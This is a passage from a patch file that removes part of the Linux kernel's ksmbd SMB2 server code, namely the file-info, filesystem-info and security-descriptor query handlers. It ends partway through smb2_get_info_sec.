+-	file_info->LastWriteTime = cpu_to_le64(time);
+-	time = ksmbd_UnixTimeToNT(stat.ctime);
+-	file_info->ChangeTime = cpu_to_le64(time);
+-	file_info->Attributes = fp->f_ci->m_fattr;
+-	file_info->Pad1 = 0;
+-	file_info->AllocationSize =
+-		cpu_to_le64(inode->i_blocks << 9);
+-	file_info->EndOfFile = S_ISDIR(stat.mode) ? 0 : cpu_to_le64(stat.size);
+-	file_info->NumberOfLinks =
+-			cpu_to_le32(get_nlink(&stat) - delete_pending);
+-	file_info->DeletePending = delete_pending;
+-	file_info->Directory = S_ISDIR(stat.mode) ? 1 : 0;
+-	file_info->Pad2 = 0;
+-	file_info->IndexNumber = cpu_to_le64(stat.ino);
+-	file_info->EASize = 0;
+-	file_info->AccessFlags = fp->daccess;
+-	file_info->CurrentByteOffset = cpu_to_le64(fp->filp->f_pos);
+-	file_info->Mode = fp->coption;
+-	file_info->AlignmentRequirement = 0;
+-	conv_len = smbConvertToUTF16((__le16 *)file_info->FileName, filename,
+-				     PATH_MAX, conn->local_nls, 0);
+-	conv_len *= 2;
+-	file_info->FileNameLength = cpu_to_le32(conv_len);
+-	rsp->OutputBufferLength =
+-		cpu_to_le32(sizeof(struct smb2_file_all_info) + conv_len - 1);
+-	kfree(filename);
+-	inc_rfc1001_len(rsp_org, le32_to_cpu(rsp->OutputBufferLength));
+-	return 0;
+-}
+-
+-static void get_file_alternate_info(struct ksmbd_work *work,
+-				    struct smb2_query_info_rsp *rsp,
+-				    struct ksmbd_file *fp,
+-				    void *rsp_org)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	struct smb2_file_alt_name_info *file_info;
+-	struct dentry *dentry = fp->filp->f_path.dentry;
+-	int conv_len;
+-
+-	spin_lock(&dentry->d_lock);
+-	file_info = (struct smb2_file_alt_name_info *)rsp->Buffer;
+-	conv_len = ksmbd_extract_shortname(conn,
+-					   dentry->d_name.name,
+-					   file_info->FileName);
+-	spin_unlock(&dentry->d_lock);
+-	file_info->FileNameLength = cpu_to_le32(conv_len);
+-	rsp->OutputBufferLength =
+-		cpu_to_le32(sizeof(struct smb2_file_alt_name_info) + conv_len);
+-	inc_rfc1001_len(rsp_org, le32_to_cpu(rsp->OutputBufferLength));
+-}
+-
+-static void get_file_stream_info(struct ksmbd_work *work,
+-				 struct smb2_query_info_rsp *rsp,
+-				 struct ksmbd_file *fp,
+-				 void *rsp_org)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	struct smb2_file_stream_info *file_info;
+-	char *stream_name, *xattr_list = NULL, *stream_buf;
+-	struct kstat stat;
+-	const struct path *path = &fp->filp->f_path;
+-	ssize_t xattr_list_len;
+-	int nbytes = 0, streamlen, stream_name_len, next, idx = 0;
+-	int buf_free_len;
+-	struct smb2_query_info_req *req = ksmbd_req_buf_next(work);
+-
+-	generic_fillattr(file_mnt_user_ns(fp->filp), file_inode(fp->filp),
+-			 &stat);
+-	file_info = (struct smb2_file_stream_info *)rsp->Buffer;
+-
+-	buf_free_len =
+-		smb2_calc_max_out_buf_len(work, 8,
+-					  le32_to_cpu(req->OutputBufferLength));
+-	if (buf_free_len < 0)
+-		goto out;
+-
+-	xattr_list_len = ksmbd_vfs_listxattr(path->dentry, &xattr_list);
+-	if (xattr_list_len < 0) {
+-		goto out;
+-	} else if (!xattr_list_len) {
+-		ksmbd_debug(SMB, "empty xattr in the file\n");
+-		goto out;
+-	}
+-
+-	while (idx < xattr_list_len) {
+-		stream_name = xattr_list + idx;
+-		streamlen = strlen(stream_name);
+-		idx += streamlen + 1;
+-
+-		ksmbd_debug(SMB, "%s, len %d\n", stream_name, streamlen);
+-
+-		if (strncmp(&stream_name[XATTR_USER_PREFIX_LEN],
+-			    STREAM_PREFIX, STREAM_PREFIX_LEN))
+-			continue;
+-
+-		stream_name_len = streamlen - (XATTR_USER_PREFIX_LEN +
+-				STREAM_PREFIX_LEN);
+-		streamlen = stream_name_len;
+-
+-		/* plus : size */
+-		streamlen += 1;
+-		stream_buf = kmalloc(streamlen + 1, GFP_KERNEL);
+-		if (!stream_buf)
+-			break;
+-
+-		streamlen = snprintf(stream_buf, streamlen + 1,
+-				     ":%s", &stream_name[XATTR_NAME_STREAM_LEN]);
+-
+-		next = sizeof(struct smb2_file_stream_info) + streamlen * 2;
+-		if (next > buf_free_len) {
+-			kfree(stream_buf);
+-			break;
+-		}
+-
+-		file_info = (struct smb2_file_stream_info *)&rsp->Buffer[nbytes];
+-		streamlen  = smbConvertToUTF16((__le16 *)file_info->StreamName,
+-					       stream_buf, streamlen,
+-					       conn->local_nls, 0);
+-		streamlen *= 2;
+-		kfree(stream_buf);
+-		file_info->StreamNameLength = cpu_to_le32(streamlen);
+-		file_info->StreamSize = cpu_to_le64(stream_name_len);
+-		file_info->StreamAllocationSize = cpu_to_le64(stream_name_len);
+-
+-		nbytes += next;
+-		buf_free_len -= next;
+-		file_info->NextEntryOffset = cpu_to_le32(next);
+-	}
+-
+-out:
+-	if (!S_ISDIR(stat.mode) &&
+-	    buf_free_len >= sizeof(struct smb2_file_stream_info) + 7 * 2) {
+-		file_info = (struct smb2_file_stream_info *)
+-			&rsp->Buffer[nbytes];
+-		streamlen = smbConvertToUTF16((__le16 *)file_info->StreamName,
+-					      "::$DATA", 7, conn->local_nls, 0);
+-		streamlen *= 2;
+-		file_info->StreamNameLength = cpu_to_le32(streamlen);
+-		file_info->StreamSize = cpu_to_le64(stat.size);
+-		file_info->StreamAllocationSize = cpu_to_le64(stat.blocks << 9);
+-		nbytes += sizeof(struct smb2_file_stream_info) + streamlen;
+-	}
+-
+-	/* last entry offset should be 0 */
+-	file_info->NextEntryOffset = 0;
+-	kvfree(xattr_list);
+-
+-	rsp->OutputBufferLength = cpu_to_le32(nbytes);
+-	inc_rfc1001_len(rsp_org, nbytes);
+-}
+-
+-static void get_file_internal_info(struct smb2_query_info_rsp *rsp,
+-				   struct ksmbd_file *fp, void *rsp_org)
+-{
+-	struct smb2_file_internal_info *file_info;
+-	struct kstat stat;
+-
+-	generic_fillattr(file_mnt_user_ns(fp->filp), file_inode(fp->filp),
+-			 &stat);
+-	file_info = (struct smb2_file_internal_info *)rsp->Buffer;
+-	file_info->IndexNumber = cpu_to_le64(stat.ino);
+-	rsp->OutputBufferLength =
+-		cpu_to_le32(sizeof(struct smb2_file_internal_info));
+-	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_internal_info));
+-}
+-
+-static int get_file_network_open_info(struct smb2_query_info_rsp *rsp,
+-				      struct ksmbd_file *fp, void *rsp_org)
+-{
+-	struct smb2_file_ntwrk_info *file_info;
+-	struct inode *inode;
+-	struct kstat stat;
+-	u64 time;
+-
+-	if (!(fp->daccess & FILE_READ_ATTRIBUTES_LE)) {
+-		pr_err("no right to read the attributes : 0x%x\n",
+-		       fp->daccess);
+-		return -EACCES;
+-	}
+-
+-	file_info = (struct smb2_file_ntwrk_info *)rsp->Buffer;
+-
+-	inode = file_inode(fp->filp);
+-	generic_fillattr(file_mnt_user_ns(fp->filp), inode, &stat);
+-
+-	file_info->CreationTime = cpu_to_le64(fp->create_time);
+-	time = ksmbd_UnixTimeToNT(stat.atime);
+-	file_info->LastAccessTime = cpu_to_le64(time);
+-	time = ksmbd_UnixTimeToNT(stat.mtime);
+-	file_info->LastWriteTime = cpu_to_le64(time);
+-	time = ksmbd_UnixTimeToNT(stat.ctime);
+-	file_info->ChangeTime = cpu_to_le64(time);
+-	file_info->Attributes = fp->f_ci->m_fattr;
+-	file_info->AllocationSize =
+-		cpu_to_le64(inode->i_blocks << 9);
+-	file_info->EndOfFile = S_ISDIR(stat.mode) ? 0 : cpu_to_le64(stat.size);
+-	file_info->Reserved = cpu_to_le32(0);
+-	rsp->OutputBufferLength =
+-		cpu_to_le32(sizeof(struct smb2_file_ntwrk_info));
+-	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_ntwrk_info));
+-	return 0;
+-}
+-
+-static void get_file_ea_info(struct smb2_query_info_rsp *rsp, void *rsp_org)
+-{
+-	struct smb2_file_ea_info *file_info;
+-
+-	file_info = (struct smb2_file_ea_info *)rsp->Buffer;
+-	file_info->EASize = 0;
+-	rsp->OutputBufferLength =
+-		cpu_to_le32(sizeof(struct smb2_file_ea_info));
+-	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_ea_info));
+-}
+-
+-static void get_file_position_info(struct smb2_query_info_rsp *rsp,
+-				   struct ksmbd_file *fp, void *rsp_org)
+-{
+-	struct smb2_file_pos_info *file_info;
+-
+-	file_info = (struct smb2_file_pos_info *)rsp->Buffer;
+-	file_info->CurrentByteOffset = cpu_to_le64(fp->filp->f_pos);
+-	rsp->OutputBufferLength =
+-		cpu_to_le32(sizeof(struct smb2_file_pos_info));
+-	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_pos_info));
+-}
+-
+-static void get_file_mode_info(struct smb2_query_info_rsp *rsp,
+-			       struct ksmbd_file *fp, void *rsp_org)
+-{
+-	struct smb2_file_mode_info *file_info;
+-
+-	file_info = (struct smb2_file_mode_info *)rsp->Buffer;
+-	file_info->Mode = fp->coption & FILE_MODE_INFO_MASK;
+-	rsp->OutputBufferLength =
+-		cpu_to_le32(sizeof(struct smb2_file_mode_info));
+-	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_mode_info));
+-}
+-
+-static void get_file_compression_info(struct smb2_query_info_rsp *rsp,
+-				      struct ksmbd_file *fp, void *rsp_org)
+-{
+-	struct smb2_file_comp_info *file_info;
+-	struct kstat stat;
+-
+-	generic_fillattr(file_mnt_user_ns(fp->filp), file_inode(fp->filp),
+-			 &stat);
+-
+-	file_info = (struct smb2_file_comp_info *)rsp->Buffer;
+-	file_info->CompressedFileSize = cpu_to_le64(stat.blocks << 9);
+-	file_info->CompressionFormat = COMPRESSION_FORMAT_NONE;
+-	file_info->CompressionUnitShift = 0;
+-	file_info->ChunkShift = 0;
+-	file_info->ClusterShift = 0;
+-	memset(&file_info->Reserved[0], 0, 3);
+-
+-	rsp->OutputBufferLength =
+-		cpu_to_le32(sizeof(struct smb2_file_comp_info));
+-	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_comp_info));
+-}
+-
+-static int get_file_attribute_tag_info(struct smb2_query_info_rsp *rsp,
+-				       struct ksmbd_file *fp, void *rsp_org)
+-{
+-	struct smb2_file_attr_tag_info *file_info;
+-
+-	if (!(fp->daccess & FILE_READ_ATTRIBUTES_LE)) {
+-		pr_err("no right to read the attributes : 0x%x\n",
+-		       fp->daccess);
+-		return -EACCES;
+-	}
+-
+-	file_info = (struct smb2_file_attr_tag_info *)rsp->Buffer;
+-	file_info->FileAttributes = fp->f_ci->m_fattr;
+-	file_info->ReparseTag = 0;
+-	rsp->OutputBufferLength =
+-		cpu_to_le32(sizeof(struct smb2_file_attr_tag_info));
+-	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_attr_tag_info));
+-	return 0;
+-}
+-
+-static int find_file_posix_info(struct smb2_query_info_rsp *rsp,
+-				struct ksmbd_file *fp, void *rsp_org)
+-{
+-	struct smb311_posix_qinfo *file_info;
+-	struct inode *inode = file_inode(fp->filp);
+-	struct user_namespace *user_ns = file_mnt_user_ns(fp->filp);
+-	vfsuid_t vfsuid = i_uid_into_vfsuid(user_ns, inode);
+-	vfsgid_t vfsgid = i_gid_into_vfsgid(user_ns, inode);
+-	u64 time;
+-	int out_buf_len = sizeof(struct smb311_posix_qinfo) + 32;
+-
+-	file_info = (struct smb311_posix_qinfo *)rsp->Buffer;
+-	file_info->CreationTime = cpu_to_le64(fp->create_time);
+-	time = ksmbd_UnixTimeToNT(inode->i_atime);
+-	file_info->LastAccessTime = cpu_to_le64(time);
+-	time = ksmbd_UnixTimeToNT(inode->i_mtime);
+-	file_info->LastWriteTime = cpu_to_le64(time);
+-	time = ksmbd_UnixTimeToNT(inode->i_ctime);
+-	file_info->ChangeTime = cpu_to_le64(time);
+-	file_info->DosAttributes = fp->f_ci->m_fattr;
+-	file_info->Inode = cpu_to_le64(inode->i_ino);
+-	file_info->EndOfFile = cpu_to_le64(inode->i_size);
+-	file_info->AllocationSize = cpu_to_le64(inode->i_blocks << 9);
+-	file_info->HardLinks = cpu_to_le32(inode->i_nlink);
+-	file_info->Mode = cpu_to_le32(inode->i_mode & 0777);
+-	file_info->DeviceId = cpu_to_le32(inode->i_rdev);
+-
+-	/*
+-	 * Sids(32) contain two sids(Domain sid(16), UNIX group sid(16)).
+-	 * UNIX sid(16) = revision(1) + num_subauth(1) + authority(6) +
+-	 *		  sub_auth(4 * 1(num_subauth)) + RID(4).
+-	 */
+-	id_to_sid(from_kuid_munged(&init_user_ns, vfsuid_into_kuid(vfsuid)),
+-		  SIDUNIX_USER, (struct smb_sid *)&file_info->Sids[0]);
+-	id_to_sid(from_kgid_munged(&init_user_ns, vfsgid_into_kgid(vfsgid)),
+-		  SIDUNIX_GROUP, (struct smb_sid *)&file_info->Sids[16]);
+-
+-	rsp->OutputBufferLength = cpu_to_le32(out_buf_len);
+-	inc_rfc1001_len(rsp_org, out_buf_len);
+-	return out_buf_len;
+-}
+-
+-static int smb2_get_info_file(struct ksmbd_work *work,
+-			      struct smb2_query_info_req *req,
+-			      struct smb2_query_info_rsp *rsp)
+-{
+-	struct ksmbd_file *fp;
+-	int fileinfoclass = 0;
+-	int rc = 0;
+-	int file_infoclass_size;
+-	unsigned int id = KSMBD_NO_FID, pid = KSMBD_NO_FID;
+-
+-	if (test_share_config_flag(work->tcon->share_conf,
+-				   KSMBD_SHARE_FLAG_PIPE)) {
+-		/* smb2 info file called for pipe */
+-		return smb2_get_info_file_pipe(work->sess, req, rsp,
+-					       work->response_buf);
+-	}
+-
+-	if (work->next_smb2_rcv_hdr_off) {
+-		if (!has_file_id(req->VolatileFileId)) {
+-			ksmbd_debug(SMB, "Compound request set FID = %llu\n",
+-				    work->compound_fid);
+-			id = work->compound_fid;
+-			pid = work->compound_pfid;
+-		}
+-	}
+-
+-	if (!has_file_id(id)) {
+-		id = req->VolatileFileId;
+-		pid = req->PersistentFileId;
+-	}
+-
+-	fp = ksmbd_lookup_fd_slow(work, id, pid);
+-	if (!fp)
+-		return -ENOENT;
+-
+-	fileinfoclass = req->FileInfoClass;
+-
+-	switch (fileinfoclass) {
+-	case FILE_ACCESS_INFORMATION:
+-		get_file_access_info(rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_ACCESS_INFORMATION_SIZE;
+-		break;
+-
+-	case FILE_BASIC_INFORMATION:
+-		rc = get_file_basic_info(rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_BASIC_INFORMATION_SIZE;
+-		break;
+-
+-	case FILE_STANDARD_INFORMATION:
+-		get_file_standard_info(rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_STANDARD_INFORMATION_SIZE;
+-		break;
+-
+-	case FILE_ALIGNMENT_INFORMATION:
+-		get_file_alignment_info(rsp, work->response_buf);
+-		file_infoclass_size = FILE_ALIGNMENT_INFORMATION_SIZE;
+-		break;
+-
+-	case FILE_ALL_INFORMATION:
+-		rc = get_file_all_info(work, rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_ALL_INFORMATION_SIZE;
+-		break;
+-
+-	case FILE_ALTERNATE_NAME_INFORMATION:
+-		get_file_alternate_info(work, rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_ALTERNATE_NAME_INFORMATION_SIZE;
+-		break;
+-
+-	case FILE_STREAM_INFORMATION:
+-		get_file_stream_info(work, rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_STREAM_INFORMATION_SIZE;
+-		break;
+-
+-	case FILE_INTERNAL_INFORMATION:
+-		get_file_internal_info(rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_INTERNAL_INFORMATION_SIZE;
+-		break;
+-
+-	case FILE_NETWORK_OPEN_INFORMATION:
+-		rc = get_file_network_open_info(rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_NETWORK_OPEN_INFORMATION_SIZE;
+-		break;
+-
+-	case FILE_EA_INFORMATION:
+-		get_file_ea_info(rsp, work->response_buf);
+-		file_infoclass_size = FILE_EA_INFORMATION_SIZE;
+-		break;
+-
+-	case FILE_FULL_EA_INFORMATION:
+-		rc = smb2_get_ea(work, fp, req, rsp, work->response_buf);
+-		file_infoclass_size = FILE_FULL_EA_INFORMATION_SIZE;
+-		break;
+-
+-	case FILE_POSITION_INFORMATION:
+-		get_file_position_info(rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_POSITION_INFORMATION_SIZE;
+-		break;
+-
+-	case FILE_MODE_INFORMATION:
+-		get_file_mode_info(rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_MODE_INFORMATION_SIZE;
+-		break;
+-
+-	case FILE_COMPRESSION_INFORMATION:
+-		get_file_compression_info(rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_COMPRESSION_INFORMATION_SIZE;
+-		break;
+-
+-	case FILE_ATTRIBUTE_TAG_INFORMATION:
+-		rc = get_file_attribute_tag_info(rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_ATTRIBUTE_TAG_INFORMATION_SIZE;
+-		break;
+-	case SMB_FIND_FILE_POSIX_INFO:
+-		if (!work->tcon->posix_extensions) {
+-			pr_err("client doesn't negotiate with SMB3.1.1 POSIX Extensions\n");
+-			rc = -EOPNOTSUPP;
+-		} else {
+-			file_infoclass_size = find_file_posix_info(rsp, fp,
+-					work->response_buf);
+-		}
+-		break;
+-	default:
+-		ksmbd_debug(SMB, "fileinfoclass %d not supported yet\n",
+-			    fileinfoclass);
+-		rc = -EOPNOTSUPP;
+-	}
+-	if (!rc)
+-		rc = buffer_check_err(le32_to_cpu(req->OutputBufferLength),
+-				      rsp, work->response_buf,
+-				      file_infoclass_size);
+-	ksmbd_fd_put(work, fp);
+-	return rc;
+-}
+-
+-static int smb2_get_info_filesystem(struct ksmbd_work *work,
+-				    struct smb2_query_info_req *req,
+-				    struct smb2_query_info_rsp *rsp)
+-{
+-	struct ksmbd_session *sess = work->sess;
+-	struct ksmbd_conn *conn = work->conn;
+-	struct ksmbd_share_config *share = work->tcon->share_conf;
+-	int fsinfoclass = 0;
+-	struct kstatfs stfs;
+-	struct path path;
+-	int rc = 0, len;
+-	int fs_infoclass_size = 0;
+-
+-	if (!share->path)
+-		return -EIO;
+-
+-	rc = kern_path(share->path, LOOKUP_NO_SYMLINKS, &path);
+-	if (rc) {
+-		pr_err("cannot create vfs path\n");
+-		return -EIO;
+-	}
+-
+-	rc = vfs_statfs(&path, &stfs);
+-	if (rc) {
+-		pr_err("cannot do stat of path %s\n", share->path);
+-		path_put(&path);
+-		return -EIO;
+-	}
+-
+-	fsinfoclass = req->FileInfoClass;
+-
+-	switch (fsinfoclass) {
+-	case FS_DEVICE_INFORMATION:
+-	{
+-		struct filesystem_device_info *info;
+-
+-		info = (struct filesystem_device_info *)rsp->Buffer;
+-
+-		info->DeviceType = cpu_to_le32(stfs.f_type);
+-		info->DeviceCharacteristics = cpu_to_le32(0x00000020);
+-		rsp->OutputBufferLength = cpu_to_le32(8);
+-		inc_rfc1001_len(work->response_buf, 8);
+-		fs_infoclass_size = FS_DEVICE_INFORMATION_SIZE;
+-		break;
+-	}
+-	case FS_ATTRIBUTE_INFORMATION:
+-	{
+-		struct filesystem_attribute_info *info;
+-		size_t sz;
+-
+-		info = (struct filesystem_attribute_info *)rsp->Buffer;
+-		info->Attributes = cpu_to_le32(FILE_SUPPORTS_OBJECT_IDS |
+-					       FILE_PERSISTENT_ACLS |
+-					       FILE_UNICODE_ON_DISK |
+-					       FILE_CASE_PRESERVED_NAMES |
+-					       FILE_CASE_SENSITIVE_SEARCH |
+-					       FILE_SUPPORTS_BLOCK_REFCOUNTING);
+-
+-		info->Attributes |= cpu_to_le32(server_conf.share_fake_fscaps);
+-
+-		if (test_share_config_flag(work->tcon->share_conf,
+-		    KSMBD_SHARE_FLAG_STREAMS))
+-			info->Attributes |= cpu_to_le32(FILE_NAMED_STREAMS);
+-
+-		info->MaxPathNameComponentLength = cpu_to_le32(stfs.f_namelen);
+-		len = smbConvertToUTF16((__le16 *)info->FileSystemName,
+-					"NTFS", PATH_MAX, conn->local_nls, 0);
+-		len = len * 2;
+-		info->FileSystemNameLen = cpu_to_le32(len);
+-		sz = sizeof(struct filesystem_attribute_info) - 2 + len;
+-		rsp->OutputBufferLength = cpu_to_le32(sz);
+-		inc_rfc1001_len(work->response_buf, sz);
+-		fs_infoclass_size = FS_ATTRIBUTE_INFORMATION_SIZE;
+-		break;
+-	}
+-	case FS_VOLUME_INFORMATION:
+-	{
+-		struct filesystem_vol_info *info;
+-		size_t sz;
+-		unsigned int serial_crc = 0;
+-
+-		info = (struct filesystem_vol_info *)(rsp->Buffer);
+-		info->VolumeCreationTime = 0;
+-		serial_crc = crc32_le(serial_crc, share->name,
+-				      strlen(share->name));
+-		serial_crc = crc32_le(serial_crc, share->path,
+-				      strlen(share->path));
+-		serial_crc = crc32_le(serial_crc, ksmbd_netbios_name(),
+-				      strlen(ksmbd_netbios_name()));
+-		/* Taking dummy value of serial number*/
+-		info->SerialNumber = cpu_to_le32(serial_crc);
+-		len = smbConvertToUTF16((__le16 *)info->VolumeLabel,
+-					share->name, PATH_MAX,
+-					conn->local_nls, 0);
+-		len = len * 2;
+-		info->VolumeLabelSize = cpu_to_le32(len);
+-		info->Reserved = 0;
+-		sz = sizeof(struct filesystem_vol_info) - 2 + len;
+-		rsp->OutputBufferLength = cpu_to_le32(sz);
+-		inc_rfc1001_len(work->response_buf, sz);
+-		fs_infoclass_size = FS_VOLUME_INFORMATION_SIZE;
+-		break;
+-	}
+-	case FS_SIZE_INFORMATION:
+-	{
+-		struct filesystem_info *info;
+-
+-		info = (struct filesystem_info *)(rsp->Buffer);
+-		info->TotalAllocationUnits = cpu_to_le64(stfs.f_blocks);
+-		info->FreeAllocationUnits = cpu_to_le64(stfs.f_bfree);
+-		info->SectorsPerAllocationUnit = cpu_to_le32(1);
+-		info->BytesPerSector = cpu_to_le32(stfs.f_bsize);
+-		rsp->OutputBufferLength = cpu_to_le32(24);
+-		inc_rfc1001_len(work->response_buf, 24);
+-		fs_infoclass_size = FS_SIZE_INFORMATION_SIZE;
+-		break;
+-	}
+-	case FS_FULL_SIZE_INFORMATION:
+-	{
+-		struct smb2_fs_full_size_info *info;
+-
+-		info = (struct smb2_fs_full_size_info *)(rsp->Buffer);
+-		info->TotalAllocationUnits = cpu_to_le64(stfs.f_blocks);
+-		info->CallerAvailableAllocationUnits =
+-					cpu_to_le64(stfs.f_bavail);
+-		info->ActualAvailableAllocationUnits =
+-					cpu_to_le64(stfs.f_bfree);
+-		info->SectorsPerAllocationUnit = cpu_to_le32(1);
+-		info->BytesPerSector = cpu_to_le32(stfs.f_bsize);
+-		rsp->OutputBufferLength = cpu_to_le32(32);
+-		inc_rfc1001_len(work->response_buf, 32);
+-		fs_infoclass_size = FS_FULL_SIZE_INFORMATION_SIZE;
+-		break;
+-	}
+-	case FS_OBJECT_ID_INFORMATION:
+-	{
+-		struct object_id_info *info;
+-
+-		info = (struct object_id_info *)(rsp->Buffer);
+-
+-		if (!user_guest(sess->user))
+-			memcpy(info->objid, user_passkey(sess->user), 16);
+-		else
+-			memset(info->objid, 0, 16);
+-
+-		info->extended_info.magic = cpu_to_le32(EXTENDED_INFO_MAGIC);
+-		info->extended_info.version = cpu_to_le32(1);
+-		info->extended_info.release = cpu_to_le32(1);
+-		info->extended_info.rel_date = 0;
+-		memcpy(info->extended_info.version_string, "1.1.0", strlen("1.1.0"));
+-		rsp->OutputBufferLength = cpu_to_le32(64);
+-		inc_rfc1001_len(work->response_buf, 64);
+-		fs_infoclass_size = FS_OBJECT_ID_INFORMATION_SIZE;
+-		break;
+-	}
+-	case FS_SECTOR_SIZE_INFORMATION:
+-	{
+-		struct smb3_fs_ss_info *info;
+-		unsigned int sector_size =
+-			min_t(unsigned int, path.mnt->mnt_sb->s_blocksize, 4096);
+-
+-		info = (struct smb3_fs_ss_info *)(rsp->Buffer);
+-
+-		info->LogicalBytesPerSector = cpu_to_le32(sector_size);
+-		info->PhysicalBytesPerSectorForAtomicity =
+-				cpu_to_le32(sector_size);
+-		info->PhysicalBytesPerSectorForPerf = cpu_to_le32(sector_size);
+-		info->FSEffPhysicalBytesPerSectorForAtomicity =
+-				cpu_to_le32(sector_size);
+-		info->Flags = cpu_to_le32(SSINFO_FLAGS_ALIGNED_DEVICE |
+-				    SSINFO_FLAGS_PARTITION_ALIGNED_ON_DEVICE);
+-		info->ByteOffsetForSectorAlignment = 0;
+-		info->ByteOffsetForPartitionAlignment = 0;
+-		rsp->OutputBufferLength = cpu_to_le32(28);
+-		inc_rfc1001_len(work->response_buf, 28);
+-		fs_infoclass_size = FS_SECTOR_SIZE_INFORMATION_SIZE;
+-		break;
+-	}
+-	case FS_CONTROL_INFORMATION:
+-	{
+-		/*
+-		 * TODO : The current implementation is based on
+-		 * test result with win7(NTFS) server. It's need to
+-		 * modify this to get valid Quota values
+-		 * from Linux kernel
+-		 */
+-		struct smb2_fs_control_info *info;
+-
+-		info = (struct smb2_fs_control_info *)(rsp->Buffer);
+-		info->FreeSpaceStartFiltering = 0;
+-		info->FreeSpaceThreshold = 0;
+-		info->FreeSpaceStopFiltering = 0;
+-		info->DefaultQuotaThreshold = cpu_to_le64(SMB2_NO_FID);
+-		info->DefaultQuotaLimit = cpu_to_le64(SMB2_NO_FID);
+-		info->Padding = 0;
+-		rsp->OutputBufferLength = cpu_to_le32(48);
+-		inc_rfc1001_len(work->response_buf, 48);
+-		fs_infoclass_size = FS_CONTROL_INFORMATION_SIZE;
+-		break;
+-	}
+-	case FS_POSIX_INFORMATION:
+-	{
+-		struct filesystem_posix_info *info;
+-
+-		if (!work->tcon->posix_extensions) {
+-			pr_err("client doesn't negotiate with SMB3.1.1 POSIX Extensions\n");
+-			rc = -EOPNOTSUPP;
+-		} else {
+-			info = (struct filesystem_posix_info *)(rsp->Buffer);
+-			info->OptimalTransferSize = cpu_to_le32(stfs.f_bsize);
+-			info->BlockSize = cpu_to_le32(stfs.f_bsize);
+-			info->TotalBlocks = cpu_to_le64(stfs.f_blocks);
+-			info->BlocksAvail = cpu_to_le64(stfs.f_bfree);
+-			info->UserBlocksAvail = cpu_to_le64(stfs.f_bavail);
+-			info->TotalFileNodes = cpu_to_le64(stfs.f_files);
+-			info->FreeFileNodes = cpu_to_le64(stfs.f_ffree);
+-			rsp->OutputBufferLength = cpu_to_le32(56);
+-			inc_rfc1001_len(work->response_buf, 56);
+-			fs_infoclass_size = FS_POSIX_INFORMATION_SIZE;
+-		}
+-		break;
+-	}
+-	default:
+-		path_put(&path);
+-		return -EOPNOTSUPP;
+-	}
+-	rc = buffer_check_err(le32_to_cpu(req->OutputBufferLength),
+-			      rsp, work->response_buf,
+-			      fs_infoclass_size);
+-	path_put(&path);
+-	return rc;
+-}
+-
+-static int smb2_get_info_sec(struct ksmbd_work *work,
+-			     struct smb2_query_info_req *req,
+-			     struct smb2_query_info_rsp *rsp)
+-{
+-	struct ksmbd_file *fp;
+-	struct user_namespace *user_ns;
+-	struct smb_ntsd *pntsd = (struct smb_ntsd *)rsp->Buffer, *ppntsd = NULL;
+-	struct smb_fattr fattr = {{0}};
+-	struct inode *inode;
+-	__u32 secdesclen = 0;
+-	unsigned int id = KSMBD_NO_FID, pid = KSMBD_NO_FID;
+-	int addition_info = le32_to_cpu(req->AdditionalInformation);
+-	int rc = 0, ppntsd_size = 0;
+-
+-	if (addition_info & ~(OWNER_SECINFO | GROUP_SECINFO | DACL_SECINFO |
+-			      PROTECTED_DACL_SECINFO |
+-			      UNPROTECTED_DACL_SECINFO)) {
+-		ksmbd_debug(SMB, "Unsupported addition info: 0x%x)\n",
+-		       addition_info);
+-
+-		pntsd->revision = cpu_to_le16(1);
+-		pntsd->type = cpu_to_le16(SELF_RELATIVE | DACL_PROTECTED);
+-		pntsd->osidoffset = 0;
+-		pntsd->gsidoffset = 0;
+-		pntsd->sacloffset = 0;
+-		pntsd->dacloffset = 0;
+-
+-		secdesclen = sizeof(struct smb_ntsd);
+-		rsp->OutputBufferLength = cpu_to_le32(secdesclen);
+-		inc_rfc1001_len(work->response_buf, secdesclen);
+-
+-		return 0;
+-	}
+-
+-	if (work->next_smb2_rcv_hdr_off) {
+-		if (!has_file_id(req->VolatileFileId)) {
+-			ksmbd_debug(SMB, "Compound request set FID = %llu\n",
+-				    work->compound_fid);
+-			id = work->compound_fid;
+-			pid = work->compound_pfid;
+-		}
+-	}
+-
+-	if (!has_file_id(id)) {
+-		id = req->VolatileFileId;
+-		pid = req->PersistentFileId;
+-	}
+-
+-	fp = ksmbd_lookup_fd_slow(work, id, pid);
+-	if (!fp)
+-		return -ENOENT;
+-
+-	user_ns = file_mnt_user_ns(fp->filp);
+-	inode = file_inode(fp->filp);
+-	ksmbd_acls_fattr(&fattr, user_ns, inode);
+-
+-	if (test_share_config_flag(work->tcon->share_conf,
+-				   KSMBD_SHARE_FLAG_ACL_XATTR))
+-		ppntsd_size = ksmbd_vfs_get_sd_xattr(work->conn, user_ns,
+-						     fp->filp->f_path.dentry,
+-						     &ppntsd);
+-
+-	/* Check if sd buffer size exceeds response buffer size */
+-	if (smb2_resp_buf_len(work, 8) > ppntsd_size)
+-		rc = build_sec_desc(user_ns, pntsd, ppntsd, ppntsd_size,
+-				    addition_info, &secdesclen, &fattr);
+-	posix_acl_release(fattr.cf_acls);
+-	posix_acl_release(fattr.cf_dacls);
+-	kfree(ppntsd);
+-	ksmbd_fd_put(work, fp);
+-	if (rc)
+-		return rc;
+-
+-	rsp->OutputBufferLength = cpu_to_le32(secdesclen);
